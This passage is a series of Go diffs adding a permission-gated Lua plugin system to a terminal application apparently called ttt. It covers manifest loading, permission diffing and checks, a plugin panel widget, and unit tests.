+	regPath := config.ConfigFilePath("plugins.ttt.json")
+	reg, err := LoadRegistry(regPath)
+	if err != nil {
+		slog.Error("load plugin registry", "error", err)
+		reg = &Registry{path: regPath}
+	}
+	m.registry = reg
+
+	entries, err := os.ReadDir(m.pluginsDir)
+	if err != nil {
+		slog.Error("read plugins directory", "error", err)
+		return nil
+	}
+
+	var needsApproval []*Plugin
+
+	for _, entry := range entries {
+		if !entry.IsDir() {
+			continue
+		}
+
+		dir := m.pluginsDir + "/" + entry.Name()
+		manifest, err := LoadManifest(dir)
+		if err != nil {
+			slog.Warn("skip plugin", "dir", entry.Name(), "error", err)
+			continue
+		}
+
+		p := &Plugin{
+			Name:     manifest.Name,
+			Dir:      dir,
+			Manifest: manifest,
+		}
+
+		regEntry := m.registry.Find(manifest.Name)
+		if regEntry == nil {
+			needsApproval = append(needsApproval, p)
+			continue
+		}
+
+		if !regEntry.Enabled {
+			continue
+		}
+
+		diff := DiffPermissions(regEntry.Permissions, manifest.Permissions)
+		if !diff.IsEmpty() {
+			regEntry.Enabled = false
+			needsApproval = append(needsApproval, p)
+			continue
+		}
+
+		p.Granted = regEntry.Permissions
+		if err := p.Init(); err != nil {
+			continue
+		}
+
+		m.plugins = append(m.plugins, p)
+		m.collectRegistrations(p)
+	}
+
+	return needsApproval
+}
+
+func (m *Manager) collectRegistrations(p *Plugin) {
+	if p.SidebarTitle != "" && p.RenderFunc != nil {
+		m.SidebarPanels = append(m.SidebarPanels, SidebarRegistration{
+			ID:     "plugin." + p.Name,
+			Title:  p.SidebarTitle,
+			Widget: NewPluginPanelWidget(p),
+		})
+	}
+}
+
+func (m *Manager) ApproveAndLoad(p *Plugin) error {
+	p.Granted = p.Manifest.Permissions
+
+	m.registry.AddOrUpdate(
+		p.Manifest.Name,
+		"",
+		p.Manifest.Version,
+		p.Manifest.Permissions,
+	)
+	if err := m.registry.Save(); err != nil {
+		slog.Error("save plugin registry", "error", err)
+	}
+
+	if err := p.Init(); err != nil {
+		return err
+	}
+
+	m.plugins = append(m.plugins, p)
+	m.collectRegistrations(p)
+	return nil
+}
+
+func (m *Manager) Shutdown() {
+	for _, p := range m.plugins {
+		p.Destroy()
+	}
+}
+
+func (m *Manager) Plugins() []*Plugin {
+	return m.plugins
+}
+
+func (m *Manager) PluginCount() int {
+	return len(m.plugins)
+}

--- a/internal/plugin/manifest.go
+++ b/internal/plugin/manifest.go
@@ -1,0 +1,39 @@
+package plugin
+
+import (
+	"encoding/json"
+	"fmt"
+	"os"
+	"path/filepath"
+)
+
+type Manifest struct {
+	Name        string        `json:"name"`
+	Description string        `json:"description"`
+	Version     string        `json:"version"`
+	Author      string        `json:"author"`
+	Entry       string        `json:"entry"`
+	Permissions PermissionSet `json:"permissions"`
+}
+
+func LoadManifest(dir string) (Manifest, error) {
+	path := filepath.Join(dir, "plugin.ttt.json")
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return Manifest{}, fmt.Errorf("read manifest: %w", err)
+	}
+
+	var m Manifest
+	if err := json.Unmarshal(data, &m); err != nil {
+		return Manifest{}, fmt.Errorf("parse manifest: %w", err)
+	}
+
+	if m.Name == "" {
+		return Manifest{}, fmt.Errorf("manifest missing required field: name")
+	}
+	if m.Entry == "" {
+		return Manifest{}, fmt.Errorf("manifest missing required field: entry")
+	}
+
+	return m, nil
+}

--- a/internal/plugin/manifest_test.go
+++ b/internal/plugin/manifest_test.go
@@ -1,0 +1,70 @@
+package plugin
+
+import (
+	"os"
+	"path/filepath"
+	"testing"
+)
+
+func TestLoadManifest(t *testing.T) {
+	dir := t.TempDir()
+	data := `{
+		"name": "test-plugin",
+		"description": "A test plugin",
+		"version": "1.0.0",
+		"author": "tester",
+		"entry": "main.ttt.lua",
+		"permissions": {
+			"panel.sidebar": true,
+			"commands": true,
+			"system.exec": ["docker"]
+		}
+	}`
+	os.WriteFile(filepath.Join(dir, "plugin.ttt.json"), []byte(data), 0644)
+
+	m, err := LoadManifest(dir)
+	if err != nil {
+		t.Fatalf("unexpected error: %v", err)
+	}
+	if m.Name != "test-plugin" {
+		t.Errorf("expected name test-plugin, got %s", m.Name)
+	}
+	if m.Entry != "main.ttt.lua" {
+		t.Errorf("expected entry main.ttt.lua, got %s", m.Entry)
+	}
+	if !m.Permissions.PanelSidebar {
+		t.Error("expected panel.sidebar to be true")
+	}
+	if len(m.Permissions.SystemExec) != 1 || m.Permissions.SystemExec[0] != "docker" {
+		t.Errorf("expected system.exec [docker], got %v", m.Permissions.SystemExec)
+	}
+}
+
+func TestLoadManifestMissingName(t *testing.T) {
+	dir := t.TempDir()
+	data := `{"entry": "main.ttt.lua"}`
+	os.WriteFile(filepath.Join(dir, "plugin.ttt.json"), []byte(data), 0644)
+
+	_, err := LoadManifest(dir)
+	if err == nil {
+		t.Fatal("expected error for missing name")
+	}
+}
+
+func TestLoadManifestMissingEntry(t *testing.T) {
+	dir := t.TempDir()
+	data := `{"name": "test"}`
+	os.WriteFile(filepath.Join(dir, "plugin.ttt.json"), []byte(data), 0644)
+
+	_, err := LoadManifest(dir)
+	if err == nil {
+		t.Fatal("expected error for missing entry")
+	}
+}
+
+func TestLoadManifestMissingFile(t *testing.T) {
+	_, err := LoadManifest(t.TempDir())
+	if err == nil {
+		t.Fatal("expected error for missing file")
+	}
+}

--- a/internal/plugin/panel_widget.go
+++ b/internal/plugin/panel_widget.go
@@ -4,15 +4,24 @@ import (
 	"github.com/eugenioenko/ttt/internal/term"
 	"github.com/eugenioenko/ttt/internal/widgets"
 	"github.com/gdamore/tcell/v2"
+	lua "github.com/yuin/gopher-lua"
 )
 
 type PluginPanelWidget struct {
 	widgets.BaseWidget
-	plugin *Plugin
+	plugin     *Plugin
+	renderFunc *lua.LFunction
+	eventFunc  *lua.LFunction
+	state      *WidgetState
 }
 
-func NewPluginPanelWidget(p *Plugin) *PluginPanelWidget {
-	return &PluginPanelWidget{plugin: p}
+func NewPluginPanelWidget(p *Plugin, renderFunc, eventFunc *lua.LFunction) *PluginPanelWidget {
+	return &PluginPanelWidget{
+		plugin:     p,
+		renderFunc: renderFunc,
+		eventFunc:  eventFunc,
+		state:      NewWidgetState(),
+	}
 }
 
 func (pw *PluginPanelWidget) Height() int { return 0 }
@@ -26,14 +35,35 @@ func (pw *PluginPanelWidget) Render(surface widgets.Surface) {
 
 	surface.Fill(term.Cell{Ch: ' ', Style: term.StyleDefault})
 
-	proxy := NewPanelProxy(surface)
-	if err := pw.plugin.CallRender(proxy); err != nil {
+	proxy := NewPanelProxy(surface, pw.plugin)
+	if err := pw.plugin.CallRenderWith(pw.renderFunc, proxy); err != nil {
 		msg := "Plugin error: " + err.Error()
 		surface.DrawText(0, 0, msg, w, term.StyleDanger)
+		return
+	}
+
+	if proxy.UsedWidgets() {
+		root := pw.state.Reconcile(proxy.Descriptors(), pw.plugin)
+		r := pw.GetRect()
+		root.SetRect(widgets.Rect{X: r.X, Y: r.Y, W: w, H: h})
+		root.Render(surface)
 	}
 }
 
 func (pw *PluginPanelWidget) HandleEvent(ev tcell.Event) widgets.EventResult {
+	if pw.state != nil && pw.state.focus != nil {
+		if pw.state.focus.HandleEvent(ev) == widgets.EventConsumed {
+			return widgets.EventConsumed
+		}
+	}
+
+	if pw.eventFunc != nil && pw.plugin.State != nil {
+		tbl := eventToLua(pw.plugin.State, ev)
+		if tbl != nil {
+			pw.plugin.CallLuaFunc(pw.eventFunc, tbl)
+		}
+	}
+
 	return widgets.EventIgnored
 }
 

--- a/internal/plugin/panel_widget.go
+++ b/internal/plugin/panel_widget.go
@@ -13,6 +13,7 @@ type PluginPanelWidget struct {
 	renderFunc *lua.LFunction
 	eventFunc  *lua.LFunction
 	state      *WidgetState
+	focused    bool
 }
 
 func NewPluginPanelWidget(p *Plugin, renderFunc, eventFunc *lua.LFunction) *PluginPanelWidget {
@@ -67,4 +68,17 @@ func (pw *PluginPanelWidget) HandleEvent(ev tcell.Event) widgets.EventResult {
 	return widgets.EventIgnored
 }
 
-func (pw *PluginPanelWidget) Focusable() bool { return true }
+func (pw *PluginPanelWidget) CursorPosition() (int, int, bool) {
+	if pw.state != nil && pw.state.focus != nil {
+		if fw := pw.state.focus.Focused(); fw != nil {
+			if cp, ok := fw.(widgets.CursorPositioner); ok {
+				return cp.CursorPosition()
+			}
+		}
+	}
+	return 0, 0, false
+}
+
+func (pw *PluginPanelWidget) Focusable() bool           { return true }
+func (pw *PluginPanelWidget) SetFocused(focused bool)    { pw.focused = focused }
+func (pw *PluginPanelWidget) IsFocused() bool            { return pw.focused }

--- a/internal/plugin/panel_widget.go
+++ b/internal/plugin/panel_widget.go
@@ -1,0 +1,40 @@
+package plugin
+
+import (
+	"github.com/eugenioenko/ttt/internal/term"
+	"github.com/eugenioenko/ttt/internal/widgets"
+	"github.com/gdamore/tcell/v2"
+)
+
+type PluginPanelWidget struct {
+	widgets.BaseWidget
+	plugin *Plugin
+}
+
+func NewPluginPanelWidget(p *Plugin) *PluginPanelWidget {
+	return &PluginPanelWidget{plugin: p}
+}
+
+func (pw *PluginPanelWidget) Height() int { return 0 }
+func (pw *PluginPanelWidget) Width() int  { return 0 }
+
+func (pw *PluginPanelWidget) Render(surface widgets.Surface) {
+	w, h := surface.Size()
+	if w <= 0 || h <= 0 {
+		return
+	}
+
+	surface.Fill(term.Cell{Ch: ' ', Style: term.StyleDefault})
+
+	proxy := NewPanelProxy(surface)
+	if err := pw.plugin.CallRender(proxy); err != nil {
+		msg := "Plugin error: " + err.Error()
+		surface.DrawText(0, 0, msg, w, term.StyleDanger)
+	}
+}
+
+func (pw *PluginPanelWidget) HandleEvent(ev tcell.Event) widgets.EventResult {
+	return widgets.EventIgnored
+}
+
+func (pw *PluginPanelWidget) Focusable() bool { return true }

--- a/internal/plugin/panel_widget_test.go
+++ b/internal/plugin/panel_widget_test.go
@@ -60,7 +60,7 @@ func TestPluginPanelWidgetRender(t *testing.T) {
 		t.Fatalf("register failed: %v", err)
 	}
 
-	pw := NewPluginPanelWidget(p)
+	pw := NewPluginPanelWidget(p, p.RenderFunc, p.EventFunc)
 	surface := newMockSurface(40, 10)
 	pw.Render(surface)
 
@@ -96,7 +96,7 @@ func TestPluginPanelWidgetRenderError(t *testing.T) {
 		t.Fatalf("register failed: %v", err)
 	}
 
-	pw := NewPluginPanelWidget(p)
+	pw := NewPluginPanelWidget(p, p.RenderFunc, p.EventFunc)
 	surface := newMockSurface(80, 10)
 	pw.Render(surface)
 
@@ -137,7 +137,7 @@ func TestPluginPanelWidgetCellAPI(t *testing.T) {
 		t.Fatalf("register failed: %v", err)
 	}
 
-	pw := NewPluginPanelWidget(p)
+	pw := NewPluginPanelWidget(p, p.RenderFunc, p.EventFunc)
 	surface := newMockSurface(40, 10)
 	pw.Render(surface)
 

--- a/internal/plugin/panel_widget_test.go
+++ b/internal/plugin/panel_widget_test.go
@@ -1,0 +1,156 @@
+package plugin
+
+import (
+	"testing"
+
+	"github.com/eugenioenko/ttt/internal/term"
+	"github.com/eugenioenko/ttt/internal/widgets"
+)
+
+type mockSurface struct {
+	w, h  int
+	cells map[[2]int]term.Cell
+	texts []mockText
+}
+
+type mockText struct {
+	x, y  int
+	text  string
+	style term.Style
+}
+
+func newMockSurface(w, h int) *mockSurface {
+	return &mockSurface{w: w, h: h, cells: make(map[[2]int]term.Cell)}
+}
+
+func (s *mockSurface) Size() (int, int)                            { return s.w, s.h }
+func (s *mockSurface) Origin() (int, int)                          { return 0, 0 }
+func (s *mockSurface) SetCell(x, y int, c term.Cell)               { s.cells[[2]int{x, y}] = c }
+func (s *mockSurface) DrawBorder(x, y, w, h int, b term.BorderSet, style term.Style) {}
+func (s *mockSurface) ClearRect(x, y, w, h int, style term.Style)  {}
+func (s *mockSurface) Fill(c term.Cell)                             {}
+func (s *mockSurface) Sub(r widgets.Rect) widgets.Surface           { return s }
+
+func (s *mockSurface) DrawText(x, y int, text string, maxW int, style term.Style) int {
+	s.texts = append(s.texts, mockText{x, y, text, style})
+	return len([]rune(text))
+}
+
+func TestPluginPanelWidgetRender(t *testing.T) {
+	p := &Plugin{
+		Name:    "test",
+		Granted: PermissionSet{PanelSidebar: true},
+	}
+	p.State = NewSandbox()
+	defer p.State.Close()
+	setupTTTModule(p.State, p)
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			sidebar = {
+				title = "Test",
+				render = function(panel)
+					panel:text(0, 0, "Hello Plugin!", "default")
+				end,
+			},
+		})
+	`)
+	if err != nil {
+		t.Fatalf("register failed: %v", err)
+	}
+
+	pw := NewPluginPanelWidget(p)
+	surface := newMockSurface(40, 10)
+	pw.Render(surface)
+
+	if len(surface.texts) == 0 {
+		t.Fatal("expected text to be drawn")
+	}
+	if surface.texts[0].text != "Hello Plugin!" {
+		t.Errorf("expected 'Hello Plugin!', got %q", surface.texts[0].text)
+	}
+}
+
+func TestPluginPanelWidgetRenderError(t *testing.T) {
+	p := &Plugin{
+		Name:    "broken",
+		Granted: PermissionSet{PanelSidebar: true},
+	}
+	p.State = NewSandbox()
+	defer p.State.Close()
+	setupTTTModule(p.State, p)
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			sidebar = {
+				title = "Broken",
+				render = function(panel)
+					error("intentional crash")
+				end,
+			},
+		})
+	`)
+	if err != nil {
+		t.Fatalf("register failed: %v", err)
+	}
+
+	pw := NewPluginPanelWidget(p)
+	surface := newMockSurface(80, 10)
+	pw.Render(surface)
+
+	found := false
+	for _, text := range surface.texts {
+		if text.style == term.StyleDanger {
+			found = true
+			break
+		}
+	}
+	if !found {
+		t.Error("expected error text to be drawn with danger style")
+	}
+}
+
+func TestPluginPanelWidgetCellAPI(t *testing.T) {
+	p := &Plugin{
+		Name:    "cell-test",
+		Granted: PermissionSet{PanelSidebar: true},
+	}
+	p.State = NewSandbox()
+	defer p.State.Close()
+	setupTTTModule(p.State, p)
+
+	err := p.State.DoString(`
+		local ttt = require("ttt")
+		ttt.register({
+			sidebar = {
+				title = "Cells",
+				render = function(panel)
+					panel:cell(0, 0, "X")
+					panel:cell(1, 0, "Y", {style = "success"})
+				end,
+			},
+		})
+	`)
+	if err != nil {
+		t.Fatalf("register failed: %v", err)
+	}
+
+	pw := NewPluginPanelWidget(p)
+	surface := newMockSurface(40, 10)
+	pw.Render(surface)
+
+	c1, ok := surface.cells[[2]int{0, 0}]
+	if !ok || c1.Ch != 'X' {
+		t.Error("expected cell (0,0) to be 'X'")
+	}
+
+	c2, ok := surface.cells[[2]int{1, 0}]
+	if !ok || c2.Ch != 'Y' {
+		t.Error("expected cell (1,0) to be 'Y'")
+	}
+	if c2.Style != term.StyleSuccess {
+		t.Errorf("expected success style, got %d", c2.Style)
+	}
+}

--- a/internal/plugin/permissions.go
+++ b/internal/plugin/permissions.go
@@ -9,6 +9,7 @@ type PermissionSet struct {
 	PanelSidebar bool     `json:"panel.sidebar,omitempty"`
 	PanelBottom  bool     `json:"panel.bottom,omitempty"`
 	PanelDrawer  bool     `json:"panel.drawer,omitempty"`
+	PanelEditor  bool     `json:"panel.editor,omitempty"`
 	Commands     bool     `json:"commands,omitempty"`
 	Keybindings  bool     `json:"keybindings,omitempty"`
 	EditorRead   bool     `json:"editor.read,omitempty"`
@@ -43,6 +44,7 @@ func DiffPermissions(granted, requested PermissionSet) PermissionDiff {
 	check("panel.sidebar", granted.PanelSidebar, requested.PanelSidebar)
 	check("panel.bottom", granted.PanelBottom, requested.PanelBottom)
 	check("panel.drawer", granted.PanelDrawer, requested.PanelDrawer)
+	check("panel.editor", granted.PanelEditor, requested.PanelEditor)
 	check("commands", granted.Commands, requested.Commands)
 	check("keybindings", granted.Keybindings, requested.Keybindings)
 	check("editor.read", granted.EditorRead, requested.EditorRead)
@@ -80,6 +82,8 @@ func (ps PermissionSet) Check(perm string) error {
 		allowed = ps.PanelBottom
 	case "panel.drawer":
 		allowed = ps.PanelDrawer
+	case "panel.editor":
+		allowed = ps.PanelEditor
 	case "commands":
 		allowed = ps.Commands
 	case "keybindings":
@@ -128,6 +132,7 @@ func (ps PermissionSet) DisplayEntries() []PermissionDiffEntry {
 	add("Sidebar panel", ps.PanelSidebar)
 	add("Bottom panel", ps.PanelBottom)
 	add("Drawer", ps.PanelDrawer)
+	add("Editor tab", ps.PanelEditor)
 	add("Commands", ps.Commands)
 	add("Keybindings", ps.Keybindings)
 	add("Read editor", ps.EditorRead)

--- a/internal/plugin/permissions.go
+++ b/internal/plugin/permissions.go
@@ -1,0 +1,147 @@
+package plugin
+
+import (
+	"fmt"
+	"slices"
+)
+
+type PermissionSet struct {
+	PanelSidebar bool     `json:"panel.sidebar,omitempty"`
+	PanelBottom  bool     `json:"panel.bottom,omitempty"`
+	PanelDrawer  bool     `json:"panel.drawer,omitempty"`
+	Commands     bool     `json:"commands,omitempty"`
+	Keybindings  bool     `json:"keybindings,omitempty"`
+	EditorRead   bool     `json:"editor.read,omitempty"`
+	EditorWrite  bool     `json:"editor.write,omitempty"`
+	FsRead       bool     `json:"fs.read,omitempty"`
+	FsWrite      bool     `json:"fs.write,omitempty"`
+	SystemExec   []string `json:"system.exec,omitempty"`
+	SystemEnv    bool     `json:"system.env,omitempty"`
+	NetworkHTTP  bool     `json:"network.http,omitempty"`
+	EventsFile   bool     `json:"events.file,omitempty"`
+	EventsEditor bool     `json:"events.editor,omitempty"`
+}
+
+type PermissionDiffEntry struct {
+	Name  string
+	Value string
+}
+
+type PermissionDiff struct {
+	Entries []PermissionDiffEntry
+}
+
+func DiffPermissions(granted, requested PermissionSet) PermissionDiff {
+	var entries []PermissionDiffEntry
+
+	check := func(name string, g, r bool) {
+		if r && !g {
+			entries = append(entries, PermissionDiffEntry{Name: name, Value: "required"})
+		}
+	}
+
+	check("panel.sidebar", granted.PanelSidebar, requested.PanelSidebar)
+	check("panel.bottom", granted.PanelBottom, requested.PanelBottom)
+	check("panel.drawer", granted.PanelDrawer, requested.PanelDrawer)
+	check("commands", granted.Commands, requested.Commands)
+	check("keybindings", granted.Keybindings, requested.Keybindings)
+	check("editor.read", granted.EditorRead, requested.EditorRead)
+	check("editor.write", granted.EditorWrite, requested.EditorWrite)
+	check("fs.read", granted.FsRead, requested.FsRead)
+	check("fs.write", granted.FsWrite, requested.FsWrite)
+	check("system.env", granted.SystemEnv, requested.SystemEnv)
+	check("network.http", granted.NetworkHTTP, requested.NetworkHTTP)
+	check("events.file", granted.EventsFile, requested.EventsFile)
+	check("events.editor", granted.EventsEditor, requested.EventsEditor)
+
+	grantedExec := make(map[string]bool)
+	for _, b := range granted.SystemExec {
+		grantedExec[b] = true
+	}
+	for _, b := range requested.SystemExec {
+		if !grantedExec[b] {
+			entries = append(entries, PermissionDiffEntry{Name: "system.exec", Value: b})
+		}
+	}
+
+	return PermissionDiff{Entries: entries}
+}
+
+func (d PermissionDiff) IsEmpty() bool {
+	return len(d.Entries) == 0
+}
+
+func (ps PermissionSet) Check(perm string) error {
+	allowed := false
+	switch perm {
+	case "panel.sidebar":
+		allowed = ps.PanelSidebar
+	case "panel.bottom":
+		allowed = ps.PanelBottom
+	case "panel.drawer":
+		allowed = ps.PanelDrawer
+	case "commands":
+		allowed = ps.Commands
+	case "keybindings":
+		allowed = ps.Keybindings
+	case "editor.read":
+		allowed = ps.EditorRead
+	case "editor.write":
+		allowed = ps.EditorWrite
+	case "fs.read":
+		allowed = ps.FsRead
+	case "fs.write":
+		allowed = ps.FsWrite
+	case "system.env":
+		allowed = ps.SystemEnv
+	case "network.http":
+		allowed = ps.NetworkHTTP
+	case "events.file":
+		allowed = ps.EventsFile
+	case "events.editor":
+		allowed = ps.EventsEditor
+	default:
+		return fmt.Errorf("unknown permission: %s", perm)
+	}
+	if !allowed {
+		return fmt.Errorf("permission denied: %s", perm)
+	}
+	return nil
+}
+
+func (ps PermissionSet) CheckExec(binary string) error {
+	if slices.Contains(ps.SystemExec, binary) {
+		return nil
+	}
+	return fmt.Errorf("permission denied: system.exec %q", binary)
+}
+
+func (ps PermissionSet) DisplayEntries() []PermissionDiffEntry {
+	var entries []PermissionDiffEntry
+
+	add := func(name string, val bool) {
+		if val {
+			entries = append(entries, PermissionDiffEntry{Name: name, Value: "yes"})
+		}
+	}
+
+	add("Sidebar panel", ps.PanelSidebar)
+	add("Bottom panel", ps.PanelBottom)
+	add("Drawer", ps.PanelDrawer)
+	add("Commands", ps.Commands)
+	add("Keybindings", ps.Keybindings)
+	add("Read editor", ps.EditorRead)
+	add("Write editor", ps.EditorWrite)
+	add("Read files", ps.FsRead)
+	add("Write files", ps.FsWrite)
+	add("Environment", ps.SystemEnv)
+	add("HTTP requests", ps.NetworkHTTP)
+	add("File events", ps.EventsFile)
+	add("Editor events", ps.EventsEditor)
+
+	for _, b := range ps.SystemExec {
+		entries = append(entries, PermissionDiffEntry{Name: "Run binary", Value: b})
+	}
+
+	return entries
+}

--- a/internal/plugin/permissions_test.go
+++ b/internal/plugin/permissions_test.go
@@ -1,0 +1,98 @@
+package plugin
+
+import "testing"
+
+func TestDiffPermissionsEmpty(t *testing.T) {
+	a := PermissionSet{PanelSidebar: true, Commands: true}
+	b := PermissionSet{PanelSidebar: true, Commands: true}
+
+	diff := DiffPermissions(a, b)
+	if !diff.IsEmpty() {
+		t.Errorf("expected empty diff, got %d entries", len(diff.Entries))
+	}
+}
+
+func TestDiffPermissionsNewBool(t *testing.T) {
+	granted := PermissionSet{PanelSidebar: true}
+	requested := PermissionSet{PanelSidebar: true, Commands: true, FsRead: true}
+
+	diff := DiffPermissions(granted, requested)
+	if diff.IsEmpty() {
+		t.Fatal("expected non-empty diff")
+	}
+	if len(diff.Entries) != 2 {
+		t.Fatalf("expected 2 entries, got %d", len(diff.Entries))
+	}
+
+	names := map[string]bool{}
+	for _, e := range diff.Entries {
+		names[e.Name] = true
+	}
+	if !names["commands"] {
+		t.Error("missing diff entry for commands")
+	}
+	if !names["fs.read"] {
+		t.Error("missing diff entry for fs.read")
+	}
+}
+
+func TestDiffPermissionsNewExec(t *testing.T) {
+	granted := PermissionSet{SystemExec: []string{"docker"}}
+	requested := PermissionSet{SystemExec: []string{"docker", "kubectl"}}
+
+	diff := DiffPermissions(granted, requested)
+	if diff.IsEmpty() {
+		t.Fatal("expected non-empty diff")
+	}
+	if len(diff.Entries) != 1 {
+		t.Fatalf("expected 1 entry, got %d", len(diff.Entries))
+	}
+	if diff.Entries[0].Value != "kubectl" {
+		t.Errorf("expected kubectl, got %s", diff.Entries[0].Value)
+	}
+}
+
+func TestDiffPermissionsSubset(t *testing.T) {
+	granted := PermissionSet{PanelSidebar: true, Commands: true, FsRead: true}
+	requested := PermissionSet{PanelSidebar: true}
+
+	diff := DiffPermissions(granted, requested)
+	if !diff.IsEmpty() {
+		t.Errorf("expected empty diff for subset, got %d entries", len(diff.Entries))
+	}
+}
+
+func TestCheckPermission(t *testing.T) {
+	ps := PermissionSet{PanelSidebar: true}
+
+	if err := ps.Check("panel.sidebar"); err != nil {
+		t.Errorf("expected allowed, got %v", err)
+	}
+	if err := ps.Check("commands"); err == nil {
+		t.Error("expected denied for commands")
+	}
+}
+
+func TestCheckExec(t *testing.T) {
+	ps := PermissionSet{SystemExec: []string{"docker", "git"}}
+
+	if err := ps.CheckExec("docker"); err != nil {
+		t.Errorf("expected allowed, got %v", err)
+	}
+	if err := ps.CheckExec("rm"); err == nil {
+		t.Error("expected denied for rm")
+	}
+}
+
+func TestDisplayEntries(t *testing.T) {
+	ps := PermissionSet{
+		PanelSidebar: true,
+		Commands:     true,
+		SystemExec:   []string{"docker"},
+	}
+
+	entries := ps.DisplayEntries()
+	if len(entries) != 3 {
+		t.Fatalf("expected 3 display entries, got %d", len(entries))
+	}
+}

--- a/internal/plugin/plugin.go
+++ b/internal/plugin/plugin.go
@@ -24,13 +24,27 @@ type Plugin struct {
 	BottomEventFunc  *lua.LFunction
 
 	RequestRedraw func()
+	PostAsync     func(*PluginAsyncResult)
+
+	Editor     EditorAPI
+	Filesystem FilesystemAPI
+	System     SystemAPI
+	Network    NetworkAPI
+
+	EventListeners map[string][]*lua.LFunction
 
 	LastError error
 }
 
 func (p *Plugin) Init() error {
+	p.EventListeners = make(map[string][]*lua.LFunction)
 	p.State = NewSandbox()
 	setupTTTModule(p.State, p)
+	setupEditorModule(p.State, p)
+	setupFsModule(p.State, p)
+	setupSystemModule(p.State, p)
+	setupNetModule(p.State, p)
+	setupEventsModule(p.State, p)
 
 	entry := filepath.Join(p.Dir, p.Manifest.Entry)
 	if err := p.State.DoFile(entry); err != nil {
@@ -56,6 +70,20 @@ func (p *Plugin) Destroy() {
 	p.BottomRenderFunc = nil
 	p.BottomEventFunc = nil
 	p.RequestRedraw = nil
+	p.PostAsync = nil
+	p.EventListeners = nil
+}
+
+func (p *Plugin) DispatchEvent(name string, args ...lua.LValue) {
+	listeners := p.EventListeners[name]
+	if len(listeners) == 0 || p.State == nil {
+		return
+	}
+	for _, fn := range listeners {
+		if err := p.CallLuaFunc(fn, args...); err != nil {
+			slog.Error("plugin event error", "plugin", p.Name, "event", name, "error", err)
+		}
+	}
 }
 
 func (p *Plugin) CallRender(proxy *PanelProxy) error {

--- a/internal/plugin/plugin.go
+++ b/internal/plugin/plugin.go
@@ -48,6 +48,10 @@ type Plugin struct {
 	ShowContextMenu func(entries []widgets.MenuEntry, x, y int, onCommand func(cmd string))
 	ShowInfoDialog    func(title string, entries []widgets.KeyValueEntry)
 	ShowConfirmDialog func(message string, onConfirm func())
+	OpenDrawer        func(renderFunc *lua.LFunction, width, minWidth int)
+	CloseDrawer       func()
+	OpenTab           func(id string, renderFunc, eventFunc *lua.LFunction)
+	CloseTab          func(id string)
 	Borders         *term.BorderSet
 
 	Editor     EditorAPI
@@ -107,6 +111,10 @@ func (p *Plugin) Destroy() {
 	p.Log = nil
 	p.ShowContextMenu = nil
 	p.ShowConfirmDialog = nil
+	p.OpenDrawer = nil
+	p.CloseDrawer = nil
+	p.OpenTab = nil
+	p.CloseTab = nil
 	p.EventListeners = nil
 }
 

--- a/internal/plugin/plugin.go
+++ b/internal/plugin/plugin.go
@@ -40,6 +40,7 @@ type Plugin struct {
 
 	RequestRedraw func()
 	PostAsync     func(*PluginAsyncResult)
+	Log           func(level, message string)
 
 	Editor     EditorAPI
 	Filesystem FilesystemAPI
@@ -66,12 +67,19 @@ func (p *Plugin) Init() error {
 		p.LastError = err
 		p.State.Close()
 		p.State = nil
-		slog.Error("plugin init failed", "plugin", p.Name, "error", err)
+		p.logError("init", err)
 		return err
 	}
 
 	p.Enabled = true
 	return nil
+}
+
+func (p *Plugin) logError(context string, err error) {
+	slog.Error("plugin error", "plugin", p.Name, "context", context, "error", err)
+	if p.Log != nil {
+		p.Log("error", context+": "+err.Error())
+	}
 }
 
 func (p *Plugin) Destroy() {
@@ -88,6 +96,7 @@ func (p *Plugin) Destroy() {
 	p.PluginKeybindings = nil
 	p.RequestRedraw = nil
 	p.PostAsync = nil
+	p.Log = nil
 	p.EventListeners = nil
 }
 
@@ -98,7 +107,7 @@ func (p *Plugin) DispatchEvent(name string, args ...lua.LValue) {
 	}
 	for _, fn := range listeners {
 		if err := p.CallLuaFunc(fn, args...); err != nil {
-			slog.Error("plugin event error", "plugin", p.Name, "event", name, "error", err)
+			p.logError("event "+name, err)
 		}
 	}
 }
@@ -120,7 +129,7 @@ func (p *Plugin) CallRenderWith(renderFunc *lua.LFunction, proxy *PanelProxy) er
 	}, ud)
 	if err != nil {
 		p.LastError = err
-		slog.Error("plugin render error", "plugin", p.Name, "error", err)
+		p.logError("render", err)
 	}
 	return err
 }

--- a/internal/plugin/plugin.go
+++ b/internal/plugin/plugin.go
@@ -19,6 +19,12 @@ type Plugin struct {
 	RenderFunc   *lua.LFunction
 	EventFunc    *lua.LFunction
 
+	BottomTitle      string
+	BottomRenderFunc *lua.LFunction
+	BottomEventFunc  *lua.LFunction
+
+	RequestRedraw func()
+
 	LastError error
 }
 
@@ -47,16 +53,23 @@ func (p *Plugin) Destroy() {
 	p.Enabled = false
 	p.RenderFunc = nil
 	p.EventFunc = nil
+	p.BottomRenderFunc = nil
+	p.BottomEventFunc = nil
+	p.RequestRedraw = nil
 }
 
 func (p *Plugin) CallRender(proxy *PanelProxy) error {
-	if p.State == nil || p.RenderFunc == nil {
+	return p.CallRenderWith(p.RenderFunc, proxy)
+}
+
+func (p *Plugin) CallRenderWith(renderFunc *lua.LFunction, proxy *PanelProxy) error {
+	if p.State == nil || renderFunc == nil {
 		return nil
 	}
 
 	ud := PushPanelProxy(p.State, proxy)
 	err := p.State.CallByParam(lua.P{
-		Fn:      p.RenderFunc,
+		Fn:      renderFunc,
 		NRet:    0,
 		Protect: true,
 	}, ud)

--- a/internal/plugin/plugin.go
+++ b/internal/plugin/plugin.go
@@ -1,0 +1,68 @@
+package plugin
+
+import (
+	"log/slog"
+	"path/filepath"
+
+	lua "github.com/yuin/gopher-lua"
+)
+
+type Plugin struct {
+	Name     string
+	Dir      string
+	Manifest Manifest
+	Granted  PermissionSet
+	Enabled  bool
+	State    *lua.LState
+
+	SidebarTitle string
+	RenderFunc   *lua.LFunction
+	EventFunc    *lua.LFunction
+
+	LastError error
+}
+
+func (p *Plugin) Init() error {
+	p.State = NewSandbox()
+	setupTTTModule(p.State, p)
+
+	entry := filepath.Join(p.Dir, p.Manifest.Entry)
+	if err := p.State.DoFile(entry); err != nil {
+		p.LastError = err
+		p.State.Close()
+		p.State = nil
+		slog.Error("plugin init failed", "plugin", p.Name, "error", err)
+		return err
+	}
+
+	p.Enabled = true
+	return nil
+}
+
+func (p *Plugin) Destroy() {
+	if p.State != nil {
+		p.State.Close()
+		p.State = nil
+	}
+	p.Enabled = false
+	p.RenderFunc = nil
+	p.EventFunc = nil
